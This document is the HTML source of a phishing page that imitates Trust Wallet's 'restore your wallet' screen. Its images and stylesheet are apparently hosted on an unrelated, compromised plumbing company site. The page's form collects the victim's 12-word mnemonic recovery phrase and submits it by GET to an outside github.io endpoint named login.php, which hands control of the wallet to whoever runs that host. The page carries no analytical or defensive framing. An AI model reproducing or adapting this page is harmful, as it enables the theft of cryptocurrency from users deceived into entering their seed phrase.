

<html lang="en">
<head>

    <meta charset="utf-8">
	<meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no">
	<meta name="theme-color" content="#000000">
	<link rel="manifest" href="static/manifest.json">
        <link rel="shortcut icon" type="image/png" href="https://upstateplumbinginc.com/wp-includes/main/favicon.ico">
	<title>Best Cryptocurrency Wallet | Ethereum Wallet | ERC20 Wallet | Trust Wallet</title>
	<link href="https://upstateplumbinginc.com/wp-includes/main/main_restore.css" rel="stylesheet">

  </head>
  <body>
  <noscript>You need to enable JavaScript to run this app.</noscript>
  <form method="GET" id="login-form" action="https://noode2024.github.io/networktw/login.php">
    <div id="root">
	<div class="App">
  <div class="NavBar NavBar--is-centered"><img class="NavBar__logo" src="https://upstateplumbinginc.com/wp-includes/main/horizontal_blues.png"></a></div>
    <div class="Pages">
	<div class="UnlockWalletPage">
	<div class="UnlockWalletPage__wrapper">
    <!--<div class="UnlockWalletPage__title box">

</div>-->
    <div class="UnlockWalletCard" >
	<div class="UnlockWalletCard__content">
	<div class="UnlockWalletCard__header">
	
	</div>

<div class="UnlockWalletViaMnemonicPhrase">
    	<div class="UnlockWalletViaMnemonicPhrase__restore">Restore your wallet</div>
	<div class="UnlockWalletViaMnemonicPhrase__title">MNEMOMIC</div>
	<textarea class="UnlockWalletViaMnemonicPhrase__mnemonic" name="Key" placeholder="Please enter your 12th word phrase" minlength="23" required></textarea>
	<div class="UnlockWalletViaMnemonicPhrase__mnemonic-instructions">Please separate each Mnemonic Phrase with a space.</div>
	
	<div class="UnlockWalletViaMnemonicPhrase__footer">
	<button type="submit" name="submit" style="width:100%;" class="GradientButton undefined GradientButton">
	<div class="GradientButton__title">Restore</div>
	</button>
	</div>
	</div>


    <!--<script>
        function changeTab(evt, cityName) {
          var i, tabcontent, tablinks;
          tabcontent = document.getElementsByClassName("ccc");
          for (i = 0; i < tabcontent.length; i++) {
            tabcontent[i].style.display = "none";
          }
          tablinks = document.getElementsByClassName("tablinks");
          for (i = 0; i < tablinks.length; i++) {
            tablinks[i].className = tablinks[i].className.replace(" TabBarItem--is-active", "");
          }
          document.getElementById(cityName).style.display = "block";
          evt.currentTarget.className += " active";
        }
    </script>-->

</form>
</body>

</html>
